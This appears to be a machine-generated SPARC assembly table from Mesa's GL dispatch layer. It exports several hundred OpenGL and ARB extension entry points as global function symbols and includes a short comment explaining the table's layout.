.globl glIndexiv ; .type glIndexiv,#function
.globl glIndexs ; .type glIndexs,#function
.globl glIndexsv ; .type glIndexsv,#function
.globl glNormal3b ; .type glNormal3b,#function
.globl glNormal3bv ; .type glNormal3bv,#function
.globl glNormal3d ; .type glNormal3d,#function
.globl glNormal3dv ; .type glNormal3dv,#function
.globl glNormal3f ; .type glNormal3f,#function
.globl glNormal3fv ; .type glNormal3fv,#function
.globl glNormal3i ; .type glNormal3i,#function
.globl glNormal3iv ; .type glNormal3iv,#function
.globl glNormal3s ; .type glNormal3s,#function
.globl glNormal3sv ; .type glNormal3sv,#function
.globl glRasterPos2d ; .type glRasterPos2d,#function
.globl glRasterPos2dv ; .type glRasterPos2dv,#function
.globl glRasterPos2f ; .type glRasterPos2f,#function
.globl glRasterPos2fv ; .type glRasterPos2fv,#function
.globl glRasterPos2i ; .type glRasterPos2i,#function
.globl glRasterPos2iv ; .type glRasterPos2iv,#function
.globl glRasterPos2s ; .type glRasterPos2s,#function
.globl glRasterPos2sv ; .type glRasterPos2sv,#function
.globl glRasterPos3d ; .type glRasterPos3d,#function
.globl glRasterPos3dv ; .type glRasterPos3dv,#function
.globl glRasterPos3f ; .type glRasterPos3f,#function
.globl glRasterPos3fv ; .type glRasterPos3fv,#function
.globl glRasterPos3i ; .type glRasterPos3i,#function
.globl glRasterPos3iv ; .type glRasterPos3iv,#function
.globl glRasterPos3s ; .type glRasterPos3s,#function
.globl glRasterPos3sv ; .type glRasterPos3sv,#function
.globl glRasterPos4d ; .type glRasterPos4d,#function
.globl glRasterPos4dv ; .type glRasterPos4dv,#function
.globl glRasterPos4f ; .type glRasterPos4f,#function
.globl glRasterPos4fv ; .type glRasterPos4fv,#function
.globl glRasterPos4i ; .type glRasterPos4i,#function
.globl glRasterPos4iv ; .type glRasterPos4iv,#function
.globl glRasterPos4s ; .type glRasterPos4s,#function
.globl glRasterPos4sv ; .type glRasterPos4sv,#function
.globl glRectd ; .type glRectd,#function
.globl glRectdv ; .type glRectdv,#function
.globl glRectf ; .type glRectf,#function
.globl glRectfv ; .type glRectfv,#function
.globl glRecti ; .type glRecti,#function
.globl glRectiv ; .type glRectiv,#function
.globl glRects ; .type glRects,#function
.globl glRectsv ; .type glRectsv,#function
.globl glTexCoord1d ; .type glTexCoord1d,#function
.globl glTexCoord1dv ; .type glTexCoord1dv,#function
.globl glTexCoord1f ; .type glTexCoord1f,#function
.globl glTexCoord1fv ; .type glTexCoord1fv,#function
.globl glTexCoord1i ; .type glTexCoord1i,#function
.globl glTexCoord1iv ; .type glTexCoord1iv,#function
.globl glTexCoord1s ; .type glTexCoord1s,#function
.globl glTexCoord1sv ; .type glTexCoord1sv,#function
.globl glTexCoord2d ; .type glTexCoord2d,#function
.globl glTexCoord2dv ; .type glTexCoord2dv,#function
.globl glTexCoord2f ; .type glTexCoord2f,#function
.globl glTexCoord2fv ; .type glTexCoord2fv,#function
.globl glTexCoord2i ; .type glTexCoord2i,#function
.globl glTexCoord2iv ; .type glTexCoord2iv,#function
.globl glTexCoord2s ; .type glTexCoord2s,#function
.globl glTexCoord2sv ; .type glTexCoord2sv,#function
.globl glTexCoord3d ; .type glTexCoord3d,#function
.globl glTexCoord3dv ; .type glTexCoord3dv,#function
.globl glTexCoord3f ; .type glTexCoord3f,#function
.globl glTexCoord3fv ; .type glTexCoord3fv,#function
.globl glTexCoord3i ; .type glTexCoord3i,#function
.globl glTexCoord3iv ; .type glTexCoord3iv,#function
.globl glTexCoord3s ; .type glTexCoord3s,#function
.globl glTexCoord3sv ; .type glTexCoord3sv,#function
.globl glTexCoord4d ; .type glTexCoord4d,#function
.globl glTexCoord4dv ; .type glTexCoord4dv,#function
.globl glTexCoord4f ; .type glTexCoord4f,#function
.globl glTexCoord4fv ; .type glTexCoord4fv,#function
.globl glTexCoord4i ; .type glTexCoord4i,#function
.globl glTexCoord4iv ; .type glTexCoord4iv,#function
.globl glTexCoord4s ; .type glTexCoord4s,#function
.globl glTexCoord4sv ; .type glTexCoord4sv,#function
.globl glVertex2d ; .type glVertex2d,#function
.globl glVertex2dv ; .type glVertex2dv,#function
.globl glVertex2f ; .type glVertex2f,#function
.globl glVertex2fv ; .type glVertex2fv,#function
.globl glVertex2i ; .type glVertex2i,#function
.globl glVertex2iv ; .type glVertex2iv,#function
.globl glVertex2s ; .type glVertex2s,#function
.globl glVertex2sv ; .type glVertex2sv,#function
.globl glVertex3d ; .type glVertex3d,#function
.globl glVertex3dv ; .type glVertex3dv,#function
.globl glVertex3f ; .type glVertex3f,#function
.globl glVertex3fv ; .type glVertex3fv,#function
.globl glVertex3i ; .type glVertex3i,#function
.globl glVertex3iv ; .type glVertex3iv,#function
.globl glVertex3s ; .type glVertex3s,#function
.globl glVertex3sv ; .type glVertex3sv,#function
.globl glVertex4d ; .type glVertex4d,#function
.globl glVertex4dv ; .type glVertex4dv,#function
.globl glVertex4f ; .type glVertex4f,#function
.globl glVertex4fv ; .type glVertex4fv,#function
.globl glVertex4i ; .type glVertex4i,#function
.globl glVertex4iv ; .type glVertex4iv,#function
.globl glVertex4s ; .type glVertex4s,#function
.globl glVertex4sv ; .type glVertex4sv,#function
.globl glClipPlane ; .type glClipPlane,#function
.globl glColorMaterial ; .type glColorMaterial,#function
.globl glCullFace ; .type glCullFace,#function
.globl glFogf ; .type glFogf,#function
.globl glFogfv ; .type glFogfv,#function
.globl glFogi ; .type glFogi,#function
.globl glFogiv ; .type glFogiv,#function
.globl glFrontFace ; .type glFrontFace,#function
.globl glHint ; .type glHint,#function
.globl glLightf ; .type glLightf,#function
.globl glLightfv ; .type glLightfv,#function
.globl glLighti ; .type glLighti,#function
.globl glLightiv ; .type glLightiv,#function
.globl glLightModelf ; .type glLightModelf,#function
.globl glLightModelfv ; .type glLightModelfv,#function
.globl glLightModeli ; .type glLightModeli,#function
.globl glLightModeliv ; .type glLightModeliv,#function
.globl glLineStipple ; .type glLineStipple,#function
.globl glLineWidth ; .type glLineWidth,#function
.globl glMaterialf ; .type glMaterialf,#function
.globl glMaterialfv ; .type glMaterialfv,#function
.globl glMateriali ; .type glMateriali,#function
.globl glMaterialiv ; .type glMaterialiv,#function
.globl glPointSize ; .type glPointSize,#function
.globl glPolygonMode ; .type glPolygonMode,#function
.globl glPolygonStipple ; .type glPolygonStipple,#function
.globl glScissor ; .type glScissor,#function
.globl glShadeModel ; .type glShadeModel,#function
.globl glTexParameterf ; .type glTexParameterf,#function
.globl glTexParameterfv ; .type glTexParameterfv,#function
.globl glTexParameteri ; .type glTexParameteri,#function
.globl glTexParameteriv ; .type glTexParameteriv,#function
.globl glTexImage1D ; .type glTexImage1D,#function
.globl glTexImage2D ; .type glTexImage2D,#function
.globl glTexEnvf ; .type glTexEnvf,#function
.globl glTexEnvfv ; .type glTexEnvfv,#function
.globl glTexEnvi ; .type glTexEnvi,#function
.globl glTexEnviv ; .type glTexEnviv,#function
.globl glTexGend ; .type glTexGend,#function
.globl glTexGendv ; .type glTexGendv,#function
.globl glTexGenf ; .type glTexGenf,#function
.globl glTexGenfv ; .type glTexGenfv,#function
.globl glTexGeni ; .type glTexGeni,#function
.globl glTexGeniv ; .type glTexGeniv,#function
.globl glFeedbackBuffer ; .type glFeedbackBuffer,#function
.globl glSelectBuffer ; .type glSelectBuffer,#function
.globl glRenderMode ; .type glRenderMode,#function
.globl glInitNames ; .type glInitNames,#function
.globl glLoadName ; .type glLoadName,#function
.globl glPassThrough ; .type glPassThrough,#function
.globl glPopName ; .type glPopName,#function
.globl glPushName ; .type glPushName,#function
.globl glDrawBuffer ; .type glDrawBuffer,#function
.globl glClear ; .type glClear,#function
.globl glClearAccum ; .type glClearAccum,#function
.globl glClearIndex ; .type glClearIndex,#function
.globl glClearColor ; .type glClearColor,#function
.globl glClearStencil ; .type glClearStencil,#function
.globl glClearDepth ; .type glClearDepth,#function
.globl glStencilMask ; .type glStencilMask,#function
.globl glColorMask ; .type glColorMask,#function
.globl glDepthMask ; .type glDepthMask,#function
.globl glIndexMask ; .type glIndexMask,#function
.globl glAccum ; .type glAccum,#function
.globl glDisable ; .type glDisable,#function
.globl glEnable ; .type glEnable,#function
.globl glFinish ; .type glFinish,#function
.globl glFlush ; .type glFlush,#function
.globl glPopAttrib ; .type glPopAttrib,#function
.globl glPushAttrib ; .type glPushAttrib,#function
.globl glMap1d ; .type glMap1d,#function
.globl glMap1f ; .type glMap1f,#function
.globl glMap2d ; .type glMap2d,#function
.globl glMap2f ; .type glMap2f,#function
.globl glMapGrid1d ; .type glMapGrid1d,#function
.globl glMapGrid1f ; .type glMapGrid1f,#function
.globl glMapGrid2d ; .type glMapGrid2d,#function
.globl glMapGrid2f ; .type glMapGrid2f,#function
.globl glEvalCoord1d ; .type glEvalCoord1d,#function
.globl glEvalCoord1dv ; .type glEvalCoord1dv,#function
.globl glEvalCoord1f ; .type glEvalCoord1f,#function
.globl glEvalCoord1fv ; .type glEvalCoord1fv,#function
.globl glEvalCoord2d ; .type glEvalCoord2d,#function
.globl glEvalCoord2dv ; .type glEvalCoord2dv,#function
.globl glEvalCoord2f ; .type glEvalCoord2f,#function
.globl glEvalCoord2fv ; .type glEvalCoord2fv,#function
.globl glEvalMesh1 ; .type glEvalMesh1,#function
.globl glEvalPoint1 ; .type glEvalPoint1,#function
.globl glEvalMesh2 ; .type glEvalMesh2,#function
.globl glEvalPoint2 ; .type glEvalPoint2,#function
.globl glAlphaFunc ; .type glAlphaFunc,#function
.globl glBlendFunc ; .type glBlendFunc,#function
.globl glLogicOp ; .type glLogicOp,#function
.globl glStencilFunc ; .type glStencilFunc,#function
.globl glStencilOp ; .type glStencilOp,#function
.globl glDepthFunc ; .type glDepthFunc,#function
.globl glPixelZoom ; .type glPixelZoom,#function
.globl glPixelTransferf ; .type glPixelTransferf,#function
.globl glPixelTransferi ; .type glPixelTransferi,#function
.globl glPixelStoref ; .type glPixelStoref,#function
.globl glPixelStorei ; .type glPixelStorei,#function
.globl glPixelMapfv ; .type glPixelMapfv,#function
.globl glPixelMapuiv ; .type glPixelMapuiv,#function
.globl glPixelMapusv ; .type glPixelMapusv,#function
.globl glReadBuffer ; .type glReadBuffer,#function
.globl glCopyPixels ; .type glCopyPixels,#function
.globl glReadPixels ; .type glReadPixels,#function
.globl glDrawPixels ; .type glDrawPixels,#function
.globl glGetBooleanv ; .type glGetBooleanv,#function
.globl glGetClipPlane ; .type glGetClipPlane,#function
.globl glGetDoublev ; .type glGetDoublev,#function
.globl glGetError ; .type glGetError,#function
.globl glGetFloatv ; .type glGetFloatv,#function
.globl glGetIntegerv ; .type glGetIntegerv,#function
.globl glGetLightfv ; .type glGetLightfv,#function
.globl glGetLightiv ; .type glGetLightiv,#function
.globl glGetMapdv ; .type glGetMapdv,#function
.globl glGetMapfv ; .type glGetMapfv,#function
.globl glGetMapiv ; .type glGetMapiv,#function
.globl glGetMaterialfv ; .type glGetMaterialfv,#function
.globl glGetMaterialiv ; .type glGetMaterialiv,#function
.globl glGetPixelMapfv ; .type glGetPixelMapfv,#function
.globl glGetPixelMapuiv ; .type glGetPixelMapuiv,#function
.globl glGetPixelMapusv ; .type glGetPixelMapusv,#function
.globl glGetPolygonStipple ; .type glGetPolygonStipple,#function
.globl glGetString ; .type glGetString,#function
.globl glGetTexEnvfv ; .type glGetTexEnvfv,#function
.globl glGetTexEnviv ; .type glGetTexEnviv,#function
.globl glGetTexGendv ; .type glGetTexGendv,#function
.globl glGetTexGenfv ; .type glGetTexGenfv,#function
.globl glGetTexGeniv ; .type glGetTexGeniv,#function
.globl glGetTexImage ; .type glGetTexImage,#function
.globl glGetTexParameterfv ; .type glGetTexParameterfv,#function
.globl glGetTexParameteriv ; .type glGetTexParameteriv,#function
.globl glGetTexLevelParameterfv ; .type glGetTexLevelParameterfv,#function
.globl glGetTexLevelParameteriv ; .type glGetTexLevelParameteriv,#function
.globl glIsEnabled ; .type glIsEnabled,#function
.globl glIsList ; .type glIsList,#function
.globl glDepthRange ; .type glDepthRange,#function
.globl glFrustum ; .type glFrustum,#function
.globl glLoadIdentity ; .type glLoadIdentity,#function
.globl glLoadMatrixf ; .type glLoadMatrixf,#function
.globl glLoadMatrixd ; .type glLoadMatrixd,#function
.globl glMatrixMode ; .type glMatrixMode,#function
.globl glMultMatrixf ; .type glMultMatrixf,#function
.globl glMultMatrixd ; .type glMultMatrixd,#function
.globl glOrtho ; .type glOrtho,#function
.globl glPopMatrix ; .type glPopMatrix,#function
.globl glPushMatrix ; .type glPushMatrix,#function
.globl glRotated ; .type glRotated,#function
.globl glRotatef ; .type glRotatef,#function
.globl glScaled ; .type glScaled,#function
.globl glScalef ; .type glScalef,#function
.globl glTranslated ; .type glTranslated,#function
.globl glTranslatef ; .type glTranslatef,#function
.globl glViewport ; .type glViewport,#function
.globl glArrayElement ; .type glArrayElement,#function
.globl glBindTexture ; .type glBindTexture,#function
.globl glColorPointer ; .type glColorPointer,#function
.globl glDisableClientState ; .type glDisableClientState,#function
.globl glDrawArrays ; .type glDrawArrays,#function
.globl glDrawElements ; .type glDrawElements,#function
.globl glEdgeFlagPointer ; .type glEdgeFlagPointer,#function
.globl glEnableClientState ; .type glEnableClientState,#function
.globl glIndexPointer ; .type glIndexPointer,#function
.globl glIndexub ; .type glIndexub,#function
.globl glIndexubv ; .type glIndexubv,#function
.globl glInterleavedArrays ; .type glInterleavedArrays,#function
.globl glNormalPointer ; .type glNormalPointer,#function
.globl glPolygonOffset ; .type glPolygonOffset,#function
.globl glTexCoordPointer ; .type glTexCoordPointer,#function
.globl glVertexPointer ; .type glVertexPointer,#function
.globl glAreTexturesResident ; .type glAreTexturesResident,#function
.globl glCopyTexImage1D ; .type glCopyTexImage1D,#function
.globl glCopyTexImage2D ; .type glCopyTexImage2D,#function
.globl glCopyTexSubImage1D ; .type glCopyTexSubImage1D,#function
.globl glCopyTexSubImage2D ; .type glCopyTexSubImage2D,#function
.globl glDeleteTextures ; .type glDeleteTextures,#function
.globl glGenTextures ; .type glGenTextures,#function
.globl glGetPointerv ; .type glGetPointerv,#function
.globl glIsTexture ; .type glIsTexture,#function
.globl glPrioritizeTextures ; .type glPrioritizeTextures,#function
.globl glTexSubImage1D ; .type glTexSubImage1D,#function
.globl glTexSubImage2D ; .type glTexSubImage2D,#function
.globl glPopClientAttrib ; .type glPopClientAttrib,#function
.globl glPushClientAttrib ; .type glPushClientAttrib,#function
.globl glBlendColor ; .type glBlendColor,#function
.globl glBlendEquation ; .type glBlendEquation,#function
.globl glDrawRangeElements ; .type glDrawRangeElements,#function
.globl glColorTable ; .type glColorTable,#function
.globl glColorTableParameterfv ; .type glColorTableParameterfv,#function
.globl glColorTableParameteriv ; .type glColorTableParameteriv,#function
.globl glCopyColorTable ; .type glCopyColorTable,#function
.globl glGetColorTable ; .type glGetColorTable,#function
.globl glGetColorTableParameterfv ; .type glGetColorTableParameterfv,#function
.globl glGetColorTableParameteriv ; .type glGetColorTableParameteriv,#function
.globl glColorSubTable ; .type glColorSubTable,#function
.globl glCopyColorSubTable ; .type glCopyColorSubTable,#function
.globl glConvolutionFilter1D ; .type glConvolutionFilter1D,#function
.globl glConvolutionFilter2D ; .type glConvolutionFilter2D,#function
.globl glConvolutionParameterf ; .type glConvolutionParameterf,#function
.globl glConvolutionParameterfv ; .type glConvolutionParameterfv,#function
.globl glConvolutionParameteri ; .type glConvolutionParameteri,#function
.globl glConvolutionParameteriv ; .type glConvolutionParameteriv,#function
.globl glCopyConvolutionFilter1D ; .type glCopyConvolutionFilter1D,#function
.globl glCopyConvolutionFilter2D ; .type glCopyConvolutionFilter2D,#function
.globl glGetConvolutionFilter ; .type glGetConvolutionFilter,#function
.globl glGetConvolutionParameterfv ; .type glGetConvolutionParameterfv,#function
.globl glGetConvolutionParameteriv ; .type glGetConvolutionParameteriv,#function
.globl glGetSeparableFilter ; .type glGetSeparableFilter,#function
.globl glSeparableFilter2D ; .type glSeparableFilter2D,#function
.globl glGetHistogram ; .type glGetHistogram,#function
.globl glGetHistogramParameterfv ; .type glGetHistogramParameterfv,#function
.globl glGetHistogramParameteriv ; .type glGetHistogramParameteriv,#function
.globl glGetMinmax ; .type glGetMinmax,#function
.globl glGetMinmaxParameterfv ; .type glGetMinmaxParameterfv,#function
.globl glGetMinmaxParameteriv ; .type glGetMinmaxParameteriv,#function
.globl glHistogram ; .type glHistogram,#function
.globl glMinmax ; .type glMinmax,#function
.globl glResetHistogram ; .type glResetHistogram,#function
.globl glResetMinmax ; .type glResetMinmax,#function
.globl glTexImage3D ; .type glTexImage3D,#function
.globl glTexSubImage3D ; .type glTexSubImage3D,#function
.globl glCopyTexSubImage3D ; .type glCopyTexSubImage3D,#function
.globl glActiveTextureARB ; .type glActiveTextureARB,#function
.globl glClientActiveTextureARB ; .type glClientActiveTextureARB,#function
.globl glMultiTexCoord1dARB ; .type glMultiTexCoord1dARB,#function
.globl glMultiTexCoord1dvARB ; .type glMultiTexCoord1dvARB,#function
.globl glMultiTexCoord1fARB ; .type glMultiTexCoord1fARB,#function
.globl glMultiTexCoord1fvARB ; .type glMultiTexCoord1fvARB,#function
.globl glMultiTexCoord1iARB ; .type glMultiTexCoord1iARB,#function
.globl glMultiTexCoord1ivARB ; .type glMultiTexCoord1ivARB,#function
.globl glMultiTexCoord1sARB ; .type glMultiTexCoord1sARB,#function
.globl glMultiTexCoord1svARB ; .type glMultiTexCoord1svARB,#function
.globl glMultiTexCoord2dARB ; .type glMultiTexCoord2dARB,#function
.globl glMultiTexCoord2dvARB ; .type glMultiTexCoord2dvARB,#function
.globl glMultiTexCoord2fARB ; .type glMultiTexCoord2fARB,#function
.globl glMultiTexCoord2fvARB ; .type glMultiTexCoord2fvARB,#function
.globl glMultiTexCoord2iARB ; .type glMultiTexCoord2iARB,#function
.globl glMultiTexCoord2ivARB ; .type glMultiTexCoord2ivARB,#function
.globl glMultiTexCoord2sARB ; .type glMultiTexCoord2sARB,#function
.globl glMultiTexCoord2svARB ; .type glMultiTexCoord2svARB,#function
.globl glMultiTexCoord3dARB ; .type glMultiTexCoord3dARB,#function
.globl glMultiTexCoord3dvARB ; .type glMultiTexCoord3dvARB,#function
.globl glMultiTexCoord3fARB ; .type glMultiTexCoord3fARB,#function
.globl glMultiTexCoord3fvARB ; .type glMultiTexCoord3fvARB,#function
.globl glMultiTexCoord3iARB ; .type glMultiTexCoord3iARB,#function
.globl glMultiTexCoord3ivARB ; .type glMultiTexCoord3ivARB,#function
.globl glMultiTexCoord3sARB ; .type glMultiTexCoord3sARB,#function
.globl glMultiTexCoord3svARB ; .type glMultiTexCoord3svARB,#function
.globl glMultiTexCoord4dARB ; .type glMultiTexCoord4dARB,#function
.globl glMultiTexCoord4dvARB ; .type glMultiTexCoord4dvARB,#function
.globl glMultiTexCoord4fARB ; .type glMultiTexCoord4fARB,#function
.globl glMultiTexCoord4fvARB ; .type glMultiTexCoord4fvARB,#function
.globl glMultiTexCoord4iARB ; .type glMultiTexCoord4iARB,#function
.globl glMultiTexCoord4ivARB ; .type glMultiTexCoord4ivARB,#function
/*
 * Symbol-export table (machine generated — do not hand-edit entries).
 *
 * Each line marks one GL entry point as a global symbol and tags it as a
 * function in the ELF symbol table (SPARC GAS syntax: `;` separates the
 * two statements on one line, and `#function` is the symbol-type tag).
 * The actual stub bodies are emitted later by the GL_STUB() macro
 * invocations that follow _mesa_sparc_glapi_begin; the ordering here
 * mirrors the dispatch-table offset order.
 *
 * Naming groups visible in this span: core GL 2.x shader/program API,
 * ARB extensions (transpose matrices, multisample, compressed textures,
 * vertex/fragment programs, VBOs, occlusion queries, shader objects),
 * EXT/NV/MESA/ATI extensions, and `gl_dispatch_stub_NNN` aliases for
 * entry points that have no public name at this dispatch offset.
 */
.globl glMultiTexCoord4sARB ; .type glMultiTexCoord4sARB,#function
.globl glMultiTexCoord4svARB ; .type glMultiTexCoord4svARB,#function
.globl glAttachShader ; .type glAttachShader,#function
.globl glCreateProgram ; .type glCreateProgram,#function
.globl glCreateShader ; .type glCreateShader,#function
.globl glDeleteProgram ; .type glDeleteProgram,#function
.globl glDeleteShader ; .type glDeleteShader,#function
.globl glDetachShader ; .type glDetachShader,#function
.globl glGetAttachedShaders ; .type glGetAttachedShaders,#function
.globl glGetProgramInfoLog ; .type glGetProgramInfoLog,#function
.globl glGetProgramiv ; .type glGetProgramiv,#function
.globl glGetShaderInfoLog ; .type glGetShaderInfoLog,#function
.globl glGetShaderiv ; .type glGetShaderiv,#function
.globl glIsProgram ; .type glIsProgram,#function
.globl glIsShader ; .type glIsShader,#function
.globl glStencilFuncSeparate ; .type glStencilFuncSeparate,#function
.globl glStencilMaskSeparate ; .type glStencilMaskSeparate,#function
.globl glStencilOpSeparate ; .type glStencilOpSeparate,#function
.globl glUniformMatrix2x3fv ; .type glUniformMatrix2x3fv,#function
.globl glUniformMatrix2x4fv ; .type glUniformMatrix2x4fv,#function
.globl glUniformMatrix3x2fv ; .type glUniformMatrix3x2fv,#function
.globl glUniformMatrix3x4fv ; .type glUniformMatrix3x4fv,#function
.globl glUniformMatrix4x2fv ; .type glUniformMatrix4x2fv,#function
.globl glUniformMatrix4x3fv ; .type glUniformMatrix4x3fv,#function
.globl glLoadTransposeMatrixdARB ; .type glLoadTransposeMatrixdARB,#function
.globl glLoadTransposeMatrixfARB ; .type glLoadTransposeMatrixfARB,#function
.globl glMultTransposeMatrixdARB ; .type glMultTransposeMatrixdARB,#function
.globl glMultTransposeMatrixfARB ; .type glMultTransposeMatrixfARB,#function
.globl glSampleCoverageARB ; .type glSampleCoverageARB,#function
.globl glCompressedTexImage1DARB ; .type glCompressedTexImage1DARB,#function
.globl glCompressedTexImage2DARB ; .type glCompressedTexImage2DARB,#function
.globl glCompressedTexImage3DARB ; .type glCompressedTexImage3DARB,#function
.globl glCompressedTexSubImage1DARB ; .type glCompressedTexSubImage1DARB,#function
.globl glCompressedTexSubImage2DARB ; .type glCompressedTexSubImage2DARB,#function
.globl glCompressedTexSubImage3DARB ; .type glCompressedTexSubImage3DARB,#function
.globl glGetCompressedTexImageARB ; .type glGetCompressedTexImageARB,#function
.globl glDisableVertexAttribArrayARB ; .type glDisableVertexAttribArrayARB,#function
.globl glEnableVertexAttribArrayARB ; .type glEnableVertexAttribArrayARB,#function
.globl glGetProgramEnvParameterdvARB ; .type glGetProgramEnvParameterdvARB,#function
.globl glGetProgramEnvParameterfvARB ; .type glGetProgramEnvParameterfvARB,#function
.globl glGetProgramLocalParameterdvARB ; .type glGetProgramLocalParameterdvARB,#function
.globl glGetProgramLocalParameterfvARB ; .type glGetProgramLocalParameterfvARB,#function
.globl glGetProgramStringARB ; .type glGetProgramStringARB,#function
.globl glGetProgramivARB ; .type glGetProgramivARB,#function
.globl glGetVertexAttribdvARB ; .type glGetVertexAttribdvARB,#function
.globl glGetVertexAttribfvARB ; .type glGetVertexAttribfvARB,#function
.globl glGetVertexAttribivARB ; .type glGetVertexAttribivARB,#function
.globl glProgramEnvParameter4dARB ; .type glProgramEnvParameter4dARB,#function
.globl glProgramEnvParameter4dvARB ; .type glProgramEnvParameter4dvARB,#function
.globl glProgramEnvParameter4fARB ; .type glProgramEnvParameter4fARB,#function
.globl glProgramEnvParameter4fvARB ; .type glProgramEnvParameter4fvARB,#function
.globl glProgramLocalParameter4dARB ; .type glProgramLocalParameter4dARB,#function
.globl glProgramLocalParameter4dvARB ; .type glProgramLocalParameter4dvARB,#function
.globl glProgramLocalParameter4fARB ; .type glProgramLocalParameter4fARB,#function
.globl glProgramLocalParameter4fvARB ; .type glProgramLocalParameter4fvARB,#function
.globl glProgramStringARB ; .type glProgramStringARB,#function
.globl glVertexAttrib1dARB ; .type glVertexAttrib1dARB,#function
.globl glVertexAttrib1dvARB ; .type glVertexAttrib1dvARB,#function
.globl glVertexAttrib1fARB ; .type glVertexAttrib1fARB,#function
.globl glVertexAttrib1fvARB ; .type glVertexAttrib1fvARB,#function
.globl glVertexAttrib1sARB ; .type glVertexAttrib1sARB,#function
.globl glVertexAttrib1svARB ; .type glVertexAttrib1svARB,#function
.globl glVertexAttrib2dARB ; .type glVertexAttrib2dARB,#function
.globl glVertexAttrib2dvARB ; .type glVertexAttrib2dvARB,#function
.globl glVertexAttrib2fARB ; .type glVertexAttrib2fARB,#function
.globl glVertexAttrib2fvARB ; .type glVertexAttrib2fvARB,#function
.globl glVertexAttrib2sARB ; .type glVertexAttrib2sARB,#function
.globl glVertexAttrib2svARB ; .type glVertexAttrib2svARB,#function
.globl glVertexAttrib3dARB ; .type glVertexAttrib3dARB,#function
.globl glVertexAttrib3dvARB ; .type glVertexAttrib3dvARB,#function
.globl glVertexAttrib3fARB ; .type glVertexAttrib3fARB,#function
.globl glVertexAttrib3fvARB ; .type glVertexAttrib3fvARB,#function
.globl glVertexAttrib3sARB ; .type glVertexAttrib3sARB,#function
.globl glVertexAttrib3svARB ; .type glVertexAttrib3svARB,#function
.globl glVertexAttrib4NbvARB ; .type glVertexAttrib4NbvARB,#function
.globl glVertexAttrib4NivARB ; .type glVertexAttrib4NivARB,#function
.globl glVertexAttrib4NsvARB ; .type glVertexAttrib4NsvARB,#function
.globl glVertexAttrib4NubARB ; .type glVertexAttrib4NubARB,#function
.globl glVertexAttrib4NubvARB ; .type glVertexAttrib4NubvARB,#function
.globl glVertexAttrib4NuivARB ; .type glVertexAttrib4NuivARB,#function
.globl glVertexAttrib4NusvARB ; .type glVertexAttrib4NusvARB,#function
.globl glVertexAttrib4bvARB ; .type glVertexAttrib4bvARB,#function
.globl glVertexAttrib4dARB ; .type glVertexAttrib4dARB,#function
.globl glVertexAttrib4dvARB ; .type glVertexAttrib4dvARB,#function
.globl glVertexAttrib4fARB ; .type glVertexAttrib4fARB,#function
.globl glVertexAttrib4fvARB ; .type glVertexAttrib4fvARB,#function
.globl glVertexAttrib4ivARB ; .type glVertexAttrib4ivARB,#function
.globl glVertexAttrib4sARB ; .type glVertexAttrib4sARB,#function
.globl glVertexAttrib4svARB ; .type glVertexAttrib4svARB,#function
.globl glVertexAttrib4ubvARB ; .type glVertexAttrib4ubvARB,#function
.globl glVertexAttrib4uivARB ; .type glVertexAttrib4uivARB,#function
.globl glVertexAttrib4usvARB ; .type glVertexAttrib4usvARB,#function
.globl glVertexAttribPointerARB ; .type glVertexAttribPointerARB,#function
.globl glBindBufferARB ; .type glBindBufferARB,#function
.globl glBufferDataARB ; .type glBufferDataARB,#function
.globl glBufferSubDataARB ; .type glBufferSubDataARB,#function
.globl glDeleteBuffersARB ; .type glDeleteBuffersARB,#function
.globl glGenBuffersARB ; .type glGenBuffersARB,#function
.globl glGetBufferParameterivARB ; .type glGetBufferParameterivARB,#function
.globl glGetBufferPointervARB ; .type glGetBufferPointervARB,#function
.globl glGetBufferSubDataARB ; .type glGetBufferSubDataARB,#function
.globl glIsBufferARB ; .type glIsBufferARB,#function
.globl glMapBufferARB ; .type glMapBufferARB,#function
.globl glUnmapBufferARB ; .type glUnmapBufferARB,#function
.globl glBeginQueryARB ; .type glBeginQueryARB,#function
.globl glDeleteQueriesARB ; .type glDeleteQueriesARB,#function
.globl glEndQueryARB ; .type glEndQueryARB,#function
.globl glGenQueriesARB ; .type glGenQueriesARB,#function
.globl glGetQueryObjectivARB ; .type glGetQueryObjectivARB,#function
.globl glGetQueryObjectuivARB ; .type glGetQueryObjectuivARB,#function
.globl glGetQueryivARB ; .type glGetQueryivARB,#function
.globl glIsQueryARB ; .type glIsQueryARB,#function
.globl glAttachObjectARB ; .type glAttachObjectARB,#function
.globl glCompileShaderARB ; .type glCompileShaderARB,#function
.globl glCreateProgramObjectARB ; .type glCreateProgramObjectARB,#function
.globl glCreateShaderObjectARB ; .type glCreateShaderObjectARB,#function
.globl glDeleteObjectARB ; .type glDeleteObjectARB,#function
.globl glDetachObjectARB ; .type glDetachObjectARB,#function
.globl glGetActiveUniformARB ; .type glGetActiveUniformARB,#function
.globl glGetAttachedObjectsARB ; .type glGetAttachedObjectsARB,#function
.globl glGetHandleARB ; .type glGetHandleARB,#function
.globl glGetInfoLogARB ; .type glGetInfoLogARB,#function
.globl glGetObjectParameterfvARB ; .type glGetObjectParameterfvARB,#function
.globl glGetObjectParameterivARB ; .type glGetObjectParameterivARB,#function
.globl glGetShaderSourceARB ; .type glGetShaderSourceARB,#function
.globl glGetUniformLocationARB ; .type glGetUniformLocationARB,#function
.globl glGetUniformfvARB ; .type glGetUniformfvARB,#function
.globl glGetUniformivARB ; .type glGetUniformivARB,#function
.globl glLinkProgramARB ; .type glLinkProgramARB,#function
.globl glShaderSourceARB ; .type glShaderSourceARB,#function
.globl glUniform1fARB ; .type glUniform1fARB,#function
.globl glUniform1fvARB ; .type glUniform1fvARB,#function
.globl glUniform1iARB ; .type glUniform1iARB,#function
.globl glUniform1ivARB ; .type glUniform1ivARB,#function
.globl glUniform2fARB ; .type glUniform2fARB,#function
.globl glUniform2fvARB ; .type glUniform2fvARB,#function
.globl glUniform2iARB ; .type glUniform2iARB,#function
.globl glUniform2ivARB ; .type glUniform2ivARB,#function
.globl glUniform3fARB ; .type glUniform3fARB,#function
.globl glUniform3fvARB ; .type glUniform3fvARB,#function
.globl glUniform3iARB ; .type glUniform3iARB,#function
.globl glUniform3ivARB ; .type glUniform3ivARB,#function
.globl glUniform4fARB ; .type glUniform4fARB,#function
.globl glUniform4fvARB ; .type glUniform4fvARB,#function
.globl glUniform4iARB ; .type glUniform4iARB,#function
.globl glUniform4ivARB ; .type glUniform4ivARB,#function
.globl glUniformMatrix2fvARB ; .type glUniformMatrix2fvARB,#function
.globl glUniformMatrix3fvARB ; .type glUniformMatrix3fvARB,#function
.globl glUniformMatrix4fvARB ; .type glUniformMatrix4fvARB,#function
